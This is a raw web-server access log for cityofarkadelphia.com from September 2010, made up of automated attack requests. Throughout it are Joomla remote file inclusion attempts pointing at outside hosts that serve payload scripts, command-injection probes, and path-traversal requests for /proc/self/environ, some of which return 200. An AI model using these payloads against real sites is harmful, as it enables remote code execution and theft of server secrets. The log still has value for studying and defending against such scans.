93.232.230.212 - - [01/Sep/2010:01:08:43 -0700] "GET /logs/access_091031.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:59 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:59 -0700] "GET /logs/access_100201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:59 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:08:59 -0700] "GET /logs/access_100201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:09:06 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:09:06 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.121.164.23 - - [01/Sep/2010:01:09:06 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:09:06 -0700] "GET /logs/access_091031.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.121.164.23 - - [01/Sep/2010:01:09:07 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:09:12 -0700] "GET /logs/access_091231.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:09:40 -0700] "GET /logs/access_091201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:09:41 -0700] "GET /logs/access_091201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
174.121.227.178 - - [01/Sep/2010:01:10:15 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
174.121.227.178 - - [01/Sep/2010:01:10:15 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
81.177.3.14 - - [01/Sep/2010:01:10:27 -0700] "GET /logs/access_100201.log//index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
81.177.3.14 - - [01/Sep/2010:01:10:27 -0700] "GET /logs//index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
81.177.3.14 - - [01/Sep/2010:01:10:27 -0700] "GET /index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:11:53 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:11:53 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:11:53 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:11:53 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:11:53 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:11:53 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:01:11:54 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:01:11:54 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:01:12:04 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
94.23.213.213 - - [01/Sep/2010:01:12:05 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
91.121.132.142 - - [01/Sep/2010:01:12:15 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
91.121.132.142 - - [01/Sep/2010:01:12:16 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:12:35 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:12:35 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:12:35 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.121.164.23 - - [01/Sep/2010:01:12:40 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
91.121.164.23 - - [01/Sep/2010:01:12:41 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
188.165.209.176 - - [01/Sep/2010:01:12:42 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
188.165.209.176 - - [01/Sep/2010:01:12:42 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:15 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:15 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:16 -0700] "GET /logs/access_100201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:15 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:16 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:16 -0700] "GET /logs/access_100201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:46 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://ruth.doiz.net/include/makers/kodak.php/CKrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:15:46 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:16:42 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:16:42 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:16:46 -0700] "GET /logs/access_091201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
81.177.3.14 - - [01/Sep/2010:01:18:09 -0700] "GET /logs/access.log//index.php?option=com_jcalpro&mosConfig.absolute.path=http://www.ulster.irishhome.net/archive/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:18:16 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:18:16 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:18:26 -0700] "GET /logs/access_091201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:20:02 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:20:02 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:20:02 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.148.64.95 - - [01/Sep/2010:01:20:24 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4084 "-" "libwww-perl/5.834" "cityofarkadelphia.com"
83.148.64.95 - - [01/Sep/2010:01:20:25 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 917 "-" "libwww-perl/5.834" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:23:14 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:23:14 -0700] "GET /logs/access_091201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:23:14 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.201.66.15 - - [01/Sep/2010:01:23:22 -0700] "GET /logs/access_091031.log HTTP/1.0" 200 1769472 "http://cityofarkadelphia.com/logs/access_091031.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:01:34:17 -0700] "GET /logs//displayCategory.php?basepath=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:01:34:17 -0700] "GET /displayCategory.php?basepath=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:01:37:32 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.3.137.234 - - [01/Sep/2010:01:37:32 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:40:40 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:40:40 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:40:40 -0700] "GET /logs/access_091031.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:40:46 -0700] "GET /logs/access.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:41:14 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:41:14 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:41:14 -0700] "GET /logs/access_091031.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:41:19 -0700] "GET /logs/access_100201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:01:41:37 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:01:41:37 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:43:53 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:43:53 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:43:53 -0700] "GET /logs/access_091031.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:43:54 -0700] "GET /logs/access_100201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:44:22 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:44:22 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:44:22 -0700] "GET /logs/access_091031.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:44:22 -0700] "GET /logs/access_100201.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:45:11 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:45:11 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:45:11 -0700] "GET /logs/access_091031.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:46:09 -0700] "GET /logs/access.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:46:57 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:46:57 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:46:57 -0700] "GET /logs/access_091031.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
220.130.9.116 - - [01/Sep/2010:01:47:56 -0700] "GET /logs/access_100201.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:48:39 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:48:39 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:48:39 -0700] "GET /logs/access_091031.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:48:39 -0700] "GET /logs/access_091231.log%20%20//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
75.127.98.12 - - [01/Sep/2010:01:48:59 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.kookies.net/blog/blog/functions/response.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:51:42 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:51:42 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:51:42 -0700] "GET /logs/access_091231.log//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:51:46 -0700] "GET /components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
93.232.230.212 - - [01/Sep/2010:01:51:46 -0700] "GET /logs//components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
